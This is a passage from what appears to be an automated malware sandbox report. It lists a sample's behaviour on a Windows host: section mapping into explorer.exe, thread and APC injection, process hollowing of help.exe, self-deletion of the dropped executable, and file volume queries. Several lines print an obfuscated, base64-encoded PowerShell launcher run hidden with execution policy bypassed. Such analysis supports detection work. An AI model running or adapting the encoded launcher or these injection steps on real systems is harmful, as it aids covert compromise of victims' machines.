gAkAE4AUgBjAE4AegB1AEkAYwBHAHAARABnAFcASQBFAHAAQgBsAHIATgBWAGkAUABPAHUATABJAEoAVgBwAHcATgBtAGgAcgAgAD0AIAAnAHoAUAB4AEIAaQB3AGwARABpAEsAeQB4AHoAUwBGACcAOwANAAoAJABLAFkAVQBlAEMATwBTAG4AbQB5AEgAUQBzAHEAdQBvAFIAbgBxAGwAbwBwAGUAWgB3AEwAIAA9ACAAJwBrAE0ASwBLAEMAagBTAEMATgBOAE0ATwBrAHgASgBQAGsAbwBWAEwAcwBQAEoAZgBMAGIAVABxACcAOwANAAoAJAB1AHYAaABxAGgAaABiAGIAbwBFAGcAWgBuAGcAYgBGAFoARgAgAD0AIAAnAGUAYQB1AGsAYgBBAG8AVQBDAGYAeQBhAFEAYwBoAFMAUgBlAFgARABQAGkAbwB2AGsAbwBsAEYAagBpAGEAbABXAGYAJwA7AA0ACgAkAHUAQQBMAEcAcQB0AE0AWQB3AHEAZAAgAD0AIAAnAHgARgBPAEoAYQBCAEMAWgB2AG0AeQBBAG4AUABqACcAOwANAAoAJABVAEUATQBFAGsAUQBuAFMARwBZAGgASgBDAEsAcwBGAEcAWABvAHoAVgBaAEEAawBUAEcAUQBJAEIATABUAGIAIAA9ACAAJwBiAEQAcgBkAFoAZgBnAFMAdgBDACcAOwANAAoAJABVAHQAVwAgAD0AIAAnAHUAcwB0AFAAYQBqAFEAdQBFAGMAawBlAEEAZQBRAHYARgBHAHkAYgBHAEEAYwBnAHIASABoAFoAWAB5AFAAJwA7AA0ACgAkAGoAZgBPAEkAUgBEAEEAYgBLAEoAbgBCAHAAQgBnAG4AZgBHAHcATgB1AHYAZQAgAD0AIAAnAFEATQBYAFQAQwByAFgARgBNAEoAdgBVAFEASABlAEIARwBYAFEAeABOAGIAcgBxAGIAdAB1AFEAQwBDAGcAbgBCAFUAcwBFAGcAaAAnADsADQAKAH0ADQAKACQAVABsAGgAbwBmAEYATABYAFgAYwB1AEgAWABmAGcAZwBwAFYAZwByAEkAeAAgAD0AIAAnAEQASwBkAEkAUwB2AFAAJwA7AA0ACgBJAGYAIAAoACcAVgBaAHkAeABMAGcAbQBNAGsAUQBXAFcAbwBIAHUASQBIAFUAbwBDAGoAegAnACAALQBlAHEAIAAnAFEAVgBlAGQAZABCAHgAcwBiAEkAQwBaAGkAWgBoAFYAQQBEAEkAdgBiAGwAYQBUAHYAUQBVAEEAeQBIAE0AcQBWAGoAaAAnACkAIAB7AA0ACgAkAGgAQwBJAEsAbgBYAHYATwBsAGkATQBqAFoAegBvAHoAYQBEAE8AZgB2AEwAaABOACAAPQAgACcAdwB1AFQAdgBMAEQAeQByAEcAbwB4AHUAeQBJAEQAcABNAGgATgBEAGsAYQB5AFQATgBRAFIAVQBCACcAOwANAAoAJABWAFUAdQBjAHEAYwBiAFMAYQBlAE4AcwBUAEwAcQBGAGIAdgBMAHAAaQBkAFQASwB4AFcAdgAgAD0AIAAnAGkAdgAnADsADQAKACQAZQBwAGEAUwBkAHoAVgBSAGEATgB0AEgAagBxAHMASABuAGQASQBvAFcASgBNAHgAcwBBAGsAZgBVAGcAYgBrACAAPQAgACcAcwBqAEMAdAB0AE0ARgBHAGQAawBiAHAAVwBrAFUARQ
              Maps a DLL or memory area into another processShow sources
              Source: C:\Users\user\AppData\Local\Temp\qMBRkI.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\qMBRkI.exeSection loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\qMBRkI.exeSection loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\help.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
              Source: C:\Windows\SysWOW64\help.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
              Modifies the context of a thread in another process (thread injection)Show sources
              Source: C:\Users\user\AppData\Local\Temp\qMBRkI.exeThread register set: target process: 3388Jump to behavior
              Source: C:\Windows\SysWOW64\help.exeThread register set: target process: 3388Jump to behavior
              Queues an APC in another process (thread injection)Show sources
              Source: C:\Users\user\AppData\Local\Temp\qMBRkI.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
              Sample uses process hollowing techniqueShow sources
              Source: C:\Users\user\AppData\Local\Temp\qMBRkI.exeSection unmapped: C:\Windows\SysWOW64\help.exe base address: 1090000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -w 1 /e RgB1AG4AYwB0AGkAbwBuACAAZABSAGgAVQBYAG0AWQBIAFkAbgBPAEkAWgB3AHYAWgBHAEYAbQBGAFYAQwBqAGwARgBOAGQAcAB6AGgAYgBJAGQATABqAGoAewAgAHAAYQByAGEAbQAoACQAaABvAHIAcABBAFIAZwAgACwAIAAkAE4AWgBtAEwAYwBBAHEASQBTAFgAZwAgACwAIAAkAHQAcgBXAFIAdgBLAEsAbABHAHEASgBDAG8AawBJAHcAVQBSAFoAWABlAGcAZwBMAGcAQQBRAEUAUgBDAGcAdgBwACAALAAgACQATgBxAFIAWgB1AHEASAB1AEYAVwBQAGsAWAByAHMAdQBuAEIAeABKAEoATgBMAEwAbAB1AHQARgBVAEUASgBPAE4AQQAgACwAIAAkAFMAZQB2AFgAagBRAGoAYQBKAHYAdwBkAFoATQBXAE8AZgB4AGYAZgBBACAALAAgACQARgBvAHoAdwBCAGEAQgBOAEEAWABYAFQAYQBRAHMAZABPAHQAWgBtAEIAUQBvAFIAVQB0AHgAKQANAAoAJABDAHcAbgBzAGwARgBhAGYAUQBNAEUAVgBQAEwAUABIAHIAVQBiAGkAdwBQAEoASgBpAEgAcQBNAEcAZgBPAE4ATABqAEQAIAA9ACAAJwB5AE4AawB3AEkARwBwAEIAWgAnADsADQAKACQAagBXAE0AQQBsAHEASABCAHQAbQBtAGUASgBkAFAATwBZAGsAIAA9ACAAJwByAEoAZgBIAEYASQBkAGsAZgBaAHAAYQBJAGoATgBYAFQAegBGAHUAWABHAEsAcQBSAFgAVQBFAEcAZwB1AGgARQBEAGgATABFAE8ARwBzAEgARwAnADsADQAKACQAYgBEAE0AZAB1AHYARgB2AE8AVABxAGEAbAB5AG8AcQBpAG4AWgBkAHkAZgBJAFYAIAA9ACAAJwBDAEMAVABFAHQATgAnADsADQAKACQAUgBlAGkAbQBFAHQAYQBJAEEAbABmAE8ATgBkAHcATQBQAFkAWABFAGgAYwBkAHcAdgBxAFkAcgB0AG0AcQBVAEcAIAA9ACAAJwBJAEcAUABDAG0AJwA7AA0ACgAkAE4AUgBjAE4AegB1AEkAYwBHAHAARABnAFcASQBFAHAAQgBsAHIATgBWAGkAUABPAHUATABJAEoAVgBwAHcATgBtAGgAcgAgAD0AIAAnAHoAUAB4AEIAaQB3AGwARABpAEsAeQB4AHoAUwBGACcAOwANAAoAJABLAFkAVQBlAEMATwBTAG4AbQB5AEgAUQBzAHEAdQBvAFIAbgBxAGwAbwBwAGUAWgB3AEwAIAA9ACAAJwBrAE0ASwBLAEMAagBTAEMATgBOAE0ATwBrAHgASgBQAGsAbwBWAEwAcwBQAEoAZgBMAGIAVABxACcAOwANAAoAJAB1AHYAaABxAGgAaABiAGIAbwBFAGcAWgBuAGcAYgBGAFoARgAgAD0AIAAnAGUAYQB1AGsAYgBBAG8AVQBDAGYAeQBhAFEAYwBoAFMAUgBlAFgARABQAGkAbwB2AGsAbwBsAEYAagBpAGEAbABXAGYAJwA7AA0ACgAkAHUAQQBMAEcAcQB0AE0AWQB3AHEAZAAgAD0AIAAnAHgARgBPAEoAYQBCAEMAWgB2AG0AeQBBAG4AUABqACcAOwANAAoAJABVAEUATQBFAGsAUQBuAFMARwBZAGgASgBDAEsAcwBGAEcAWABvAHoAVgBaAEEAawBUAEcAUQBJAEIATABUAGIAIAA9ACAAJwBiAEQAcgBkAFoAZgBnAFMAdgBDACcAOwANAAoAJABVAHQAVwAgAD0AIAAnAHUAcwB0AFAAYQBqAFEAdQBFAGMAawBlAEEAZQBRAHYARgBHAHkAYgBHAEEAYwBnAHIASABoAFoAWAB5AFAAJwA7AA0ACgAkAGoAZgBPAEkAUgBEAEEAYgBLAEoAbgBCAHAAQgBnAG4AZgBHAHcATgB1AHYAZQAgAD0AIAAnAFEATQBYAFQAQwByAFgARgBNAEoAdgBVAFEASABlAEIARwBYAFEAeABOAGIAcgBxAGIAdAB1AFEAQwBDAGcAbgBCAFUAcwBFAGcAaAAnADsADQAKAH0ADQAKACQAVABsAGgAbwBmAEYATABYAFgAYwB1AEgAWABmAGcAZwBwAFYAZwByAEkAeAAgAD0AIAAnAEQASwBkAEkAUwB2AFAAJwA7AA0ACgBJAGYAIAAoACcAVgBaAHkAeABMAGcAbQBNAGsAUQBXAFcAbwBIAHUASQBIAFUAbwBDAGoAegAnACAALQBlAHEAIAAnAFEAVgBlAGQAZABCAHgAcwBiAEkAQwBaAGkAWgBoAFYAQQBEAEkAdgBiAGwAYQBUAHYAUQBVAEEAeQBIAE0AcQBWAGoAaAAnACkAIAB7AA0ACgAkAGgAQwBJAEsAbgBYAHYATwBsAGkATQBqAFoAegBvAHoAYQBEAE8AZgB2AEwAaABOACAAPQAgACcAdwB1AFQAdgBMAEQAeQByAEcAbwB4AHUAeQBJAEQAcABNAGgATgBEAGsAYQB5AFQATgBRAFIAVQBCACcAOwANAAoAJABWAFUAdQBjAHEAYwBiAFMAYQBlAE4AcwBUAEwAcQBGAGIAdgBMAHAAaQBkAFQASwB4AFcAdgAgAD0AIAAnAGkAdgAnADsADQAKACQAZQBwAGEAUwBkAHoAVgBSAGEATgB0AEgAagBxAHMASABuAGQASQBvAFcASgBNAHgAcwBBAGsAZgBVAGcAYgBrACAAPQAgACcAcwBqAEMAdAB0AE0ARgBHAGQAawBiAHAAVwBrAFUARQJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\qMBRkI.exe 'C:\Users\user\AppData\Local\Temp\qMBRkI.exe' Jump to behavior
              Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\qMBRkI.exe'Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -w 1 /e RgB1AG4AYwB0AGkAbwBuACAAZABSAGgAVQBYAG0AWQBIAFkAbgBPAEkAWgB3AHYAWgBHAEYAbQBGAFYAQwBqAGwARgBOAGQAcAB6AGgAYgBJAGQATABqAGoAewAgAHAAYQByAGEAbQAoACQAaABvAHIAcABBAFIAZwAgACwAIAAkAE4AWgBtAEwAYwBBAHEASQBTAFgAZwAgACwAIAAkAHQAcgBXAFIAdgBLAEsAbABHAHEASgBDAG8AawBJAHcAVQBSAFoAWABlAGcAZwBMAGcAQQBRAEUAUgBDAGcAdgBwACAALAAgACQATgBxAFIAWgB1AHEASAB1AEYAVwBQAGsAWAByAHMAdQBuAEIAeABKAEoATgBMAEwAbAB1AHQARgBVAEUASgBPAE4AQQAgACwAIAAkAFMAZQB2AFgAagBRAGoAYQBKAHYAdwBkAFoATQBXAE8AZgB4AGYAZgBBACAALAAgACQARgBvAHoAdwBCAGEAQgBOAEEAWABYAFQAYQBRAHMAZABPAHQAWgBtAEIAUQBvAFIAVQB0AHgAKQANAAoAJABDAHcAbgBzAGwARgBhAGYAUQBNAEUAVgBQAEwAUABIAHIAVQBiAGkAdwBQAEoASgBpAEgAcQBNAEcAZgBPAE4ATABqAEQAIAA9ACAAJwB5AE4AawB3AEkARwBwAEIAWgAnADsADQAKACQAagBXAE0AQQBsAHEASABCAHQAbQBtAGUASgBkAFAATwBZAGsAIAA9ACAAJwByAEoAZgBIAEYASQBkAGsAZgBaAHAAYQBJAGoATgBYAFQAegBGAHUAWABHAEsAcQBSAFgAVQBFAEcAZwB1AGgARQBEAGgATABFAE8ARwBzAEgARwAnADsADQAKACQAYgBEAE0AZAB1AHYARgB2AE8AVABxAGEAbAB5AG8AcQBpAG4AWgBkAHkAZgBJAFYAIAA9ACAAJwBDAEMAVABFAHQATgAnADsADQAKACQAUgBlAGkAbQBFAHQAYQBJAEEAbABmAE8ATgBkAHcATQBQAFkAWABFAGgAYwBkAHcAdgBxAFkAcgB0AG0AcQBVAEcAIAA9ACAAJwBJAEcAUABDAG0AJwA7AA0ACgAkAE4AUgBjAE4AegB1AEkAYwBHAHAARABnAFcASQBFAHAAQgBsAHIATgBWAGkAUABPAHUATABJAEoAVgBwAHcATgBtAGgAcgAgAD0AIAAnAHoAUAB4AEIAaQB3AGwARABpAEsAeQB4AHoAUwBGACcAOwANAAoAJABLAFkAVQBlAEMATwBTAG4AbQB5AEgAUQBzAHEAdQBvAFIAbgBxAGwAbwBwAGUAWgB3AEwAIAA9ACAAJwBrAE0ASwBLAEMAagBTAEMATgBOAE0ATwBrAHgASgBQAGsAbwBWAEwAcwBQAEoAZgBMAGIAVABxACcAOwANAAoAJAB1AHYAaABxAGgAaABiAGIAbwBFAGcAWgBuAGcAYgBGAFoARgAgAD0AIAAnAGUAYQB1AGsAYgBBAG8AVQBDAGYAeQBhAFEAYwBoAFMAUgBlAFgARABQAGkAbwB2AGsAbwBsAEYAagBpAGEAbABXAGYAJwA7AA0ACgAkAHUAQQBMAEcAcQB0AE0AWQB3AHEAZAAgAD0AIAAnAHgARgBPAEoAYQBCAEMAWgB2AG0AeQBBAG4AUABqACcAOwANAAoAJABVAEUATQBFAGsAUQBuAFMARwBZAGgASgBDAEsAcwBGAEcAWABvAHoAVgBaAEEAawBUAEcAUQBJAEIATABUAGIAIAA9ACAAJwBiAEQAcgBkAFoAZgBnAFMAdgBDACcAOwANAAoAJABVAHQAVwAgAD0AIAAnAHUAcwB0AFAAYQBqAFEAdQBFAGMAawBlAEEAZQBRAHYARgBHAHkAYgBHAEEAYwBnAHIASABoAFoAWAB5AFAAJwA7AA0ACgAkAGoAZgBPAEkAUgBEAEEAYgBLAEoAbgBCAHAAQgBnAG4AZgBHAHcATgB1AHYAZQAgAD0AIAAnAFEATQBYAFQAQwByAFgARgBNAEoAdgBVAFEASABlAEIARwBYAFEAeABOAGIAcgBxAGIAdAB1AFEAQwBDAGcAbgBCAFUAcwBFAGcAaAAnADsADQAKAH0ADQAKACQAVABsAGgAbwBmAEYATABYAFgAYwB1AEgAWABmAGcAZwBwAFYAZwByAEkAeAAgAD0AIAAnAEQASwBkAEkAUwB2AFAAJwA7AA0ACgBJAGYAIAAoACcAVgBaAHkAeABMAGcAbQBNAGsAUQBXAFcAbwBIAHUASQBIAFUAbwBDAGoAegAnACAALQBlAHEAIAAnAFEAVgBlAGQAZABCAHgAcwBiAEkAQwBaAGkAWgBoAFYAQQBEAEkAdgBiAGwAYQBUAHYAUQBVAEEAeQBIAE0AcQBWAGoAaAAnACkAIAB7AA0ACgAkAGgAQwBJAEsAbgBYAHYATwBsAGkATQBqAFoAegBvAHoAYQBEAE8AZgB2AEwAaABOACAAPQAgACcAdwB1AFQAdgBMAEQAeQByAEcAbwB4AHUAeQBJAEQAcABNAGgATgBEAGsAYQB5AFQATgBRAFIAVQBCACcAOwANAAoAJABWAFUAdQBjAHEAYwBiAFMAYQBlAE4AcwBUAEwAcQBGAGIAdgBMAHAAaQBkAFQASwB4AFcAdgAgAD0AIAAnAGkAdgAnADsADQAKACQAZQBwAGEAUwBkAHoAVgBSAGEATgB0AEgAagBxAHMASABuAGQASQBvAFcASgBNAHgAcwBBAGsAZgBVAGcAYgBrACAAPQAgACcAcwBqAEMAdAB0AE0ARgBHAGQAawBiAHAAVwBrAFUARQ
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -w 1 /e RgB1AG4AYwB0AGkAbwBuACAAZABSAGgAVQBYAG0AWQBIAFkAbgBPAEkAWgB3AHYAWgBHAEYAbQBGAFYAQwBqAGwARgBOAGQAcAB6AGgAYgBJAGQATABqAGoAewAgAHAAYQByAGEAbQAoACQAaABvAHIAcABBAFIAZwAgACwAIAAkAE4AWgBtAEwAYwBBAHEASQBTAFgAZwAgACwAIAAkAHQAcgBXAFIAdgBLAEsAbABHAHEASgBDAG8AawBJAHcAVQBSAFoAWABlAGcAZwBMAGcAQQBRAEUAUgBDAGcAdgBwACAALAAgACQATgBxAFIAWgB1AHEASAB1AEYAVwBQAGsAWAByAHMAdQBuAEIAeABKAEoATgBMAEwAbAB1AHQARgBVAEUASgBPAE4AQQAgACwAIAAkAFMAZQB2AFgAagBRAGoAYQBKAHYAdwBkAFoATQBXAE8AZgB4AGYAZgBBACAALAAgACQARgBvAHoAdwBCAGEAQgBOAEEAWABYAFQAYQBRAHMAZABPAHQAWgBtAEIAUQBvAFIAVQB0AHgAKQANAAoAJABDAHcAbgBzAGwARgBhAGYAUQBNAEUAVgBQAEwAUABIAHIAVQBiAGkAdwBQAEoASgBpAEgAcQBNAEcAZgBPAE4ATABqAEQAIAA9ACAAJwB5AE4AawB3AEkARwBwAEIAWgAnADsADQAKACQAagBXAE0AQQBsAHEASABCAHQAbQBtAGUASgBkAFAATwBZAGsAIAA9ACAAJwByAEoAZgBIAEYASQBkAGsAZgBaAHAAYQBJAGoATgBYAFQAegBGAHUAWABHAEsAcQBSAFgAVQBFAEcAZwB1AGgARQBEAGgATABFAE8ARwBzAEgARwAnADsADQAKACQAYgBEAE0AZAB1AHYARgB2AE8AVABxAGEAbAB5AG8AcQBpAG4AWgBkAHkAZgBJAFYAIAA9ACAAJwBDAEMAVABFAHQATgAnADsADQAKACQAUgBlAGkAbQBFAHQAYQBJAEEAbABmAE8ATgBkAHcATQBQAFkAWABFAGgAYwBkAHcAdgBxAFkAcgB0AG0AcQBVAEcAIAA9ACAAJwBJAEcAUABDAG0AJwA7AA0ACgAkAE4AUgBjAE4AegB1AEkAYwBHAHAARABnAFcASQBFAHAAQgBsAHIATgBWAGkAUABPAHUATABJAEoAVgBwAHcATgBtAGgAcgAgAD0AIAAnAHoAUAB4AEIAaQB3AGwARABpAEsAeQB4AHoAUwBGACcAOwANAAoAJABLAFkAVQBlAEMATwBTAG4AbQB5AEgAUQBzAHEAdQBvAFIAbgBxAGwAbwBwAGUAWgB3AEwAIAA9ACAAJwBrAE0ASwBLAEMAagBTAEMATgBOAE0ATwBrAHgASgBQAGsAbwBWAEwAcwBQAEoAZgBMAGIAVABxACcAOwANAAoAJAB1AHYAaABxAGgAaABiAGIAbwBFAGcAWgBuAGcAYgBGAFoARgAgAD0AIAAnAGUAYQB1AGsAYgBBAG8AVQBDAGYAeQBhAFEAYwBoAFMAUgBlAFgARABQAGkAbwB2AGsAbwBsAEYAagBpAGEAbABXAGYAJwA7AA0ACgAkAHUAQQBMAEcAcQB0AE0AWQB3AHEAZAAgAD0AIAAnAHgARgBPAEoAYQBCAEMAWgB2AG0AeQBBAG4AUABqACcAOwANAAoAJABVAEUATQBFAGsAUQBuAFMARwBZAGgASgBDAEsAcwBGAEcAWABvAHoAVgBaAEEAawBUAEcAUQBJAEIATABUAGIAIAA9ACAAJwBiAEQAcgBkAFoAZgBnAFMAdgBDACcAOwANAAoAJABVAHQAVwAgAD0AIAAnAHUAcwB0AFAAYQBqAFEAdQBFAGMAawBlAEEAZQBRAHYARgBHAHkAYgBHAEEAYwBnAHIASABoAFoAWAB5AFAAJwA7AA0ACgAkAGoAZgBPAEkAUgBEAEEAYgBLAEoAbgBCAHAAQgBnAG4AZgBHAHcATgB1AHYAZQAgAD0AIAAnAFEATQBYAFQAQwByAFgARgBNAEoAdgBVAFEASABlAEIARwBYAFEAeABOAGIAcgBxAGIAdAB1AFEAQwBDAGcAbgBCAFUAcwBFAGcAaAAnADsADQAKAH0ADQAKACQAVABsAGgAbwBmAEYATABYAFgAYwB1AEgAWABmAGcAZwBwAFYAZwByAEkAeAAgAD0AIAAnAEQASwBkAEkAUwB2AFAAJwA7AA0ACgBJAGYAIAAoACcAVgBaAHkAeABMAGcAbQBNAGsAUQBXAFcAbwBIAHUASQBIAFUAbwBDAGoAegAnACAALQBlAHEAIAAnAFEAVgBlAGQAZABCAHgAcwBiAEkAQwBaAGkAWgBoAFYAQQBEAEkAdgBiAGwAYQBUAHYAUQBVAEEAeQBIAE0AcQBWAGoAaAAnACkAIAB7AA0ACgAkAGgAQwBJAEsAbgBYAHYATwBsAGkATQBqAFoAegBvAHoAYQBEAE8AZgB2AEwAaABOACAAPQAgACcAdwB1AFQAdgBMAEQAeQByAEcAbwB4AHUAeQBJAEQAcABNAGgATgBEAGsAYQB5AFQATgBRAFIAVQBCACcAOwANAAoAJABWAFUAdQBjAHEAYwBiAFMAYQBlAE4AcwBUAEwAcQBGAGIAdgBMAHAAaQBkAFQASwB4AFcAdgAgAD0AIAAnAGkAdgAnADsADQAKACQAZQBwAGEAUwBkAHoAVgBSAGEATgB0AEgAagBxAHMASABuAGQASQBvAFcASgBNAHgAcwBBAGsAZgBVAGcAYgBrACAAPQAgACcAcwBqAEMAdAB0AE0ARgBHAGQAawBiAHAAVwBrAFUARQJump to behavior
              Source: explorer.exe, 00000013.00000002.485234243.0000000001398000.00000004.00000020.sdmpBinary or memory string: ProgmanamF
              Source: explorer.exe, 00000013.00000000.361273063.0000000001980000.00000002.00000001.sdmp, help.exe, 00000015.00000002.489773495.00000000054C0000.00000002.00000001.sdmpBinary or memory string: Program Manager
              Source: explorer.exe, 00000013.00000000.384363645.000000000871F000.00000004.00000001.sdmp, help.exe, 00000015.00000002.489773495.00000000054C0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
              Source: explorer.exe, 00000013.00000000.361273063.0000000001980000.00000002.00000001.sdmp, help.exe, 00000015.00000002.489773495.00000000054C0000.00000002.00000001.sdmpBinary or memory string: Progman
              Source: explorer.exe, 00000013.00000000.361273063.0000000001980000.00000002.00000001.sdmp, help.exe, 00000015.00000002.489773495.00000000054C0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
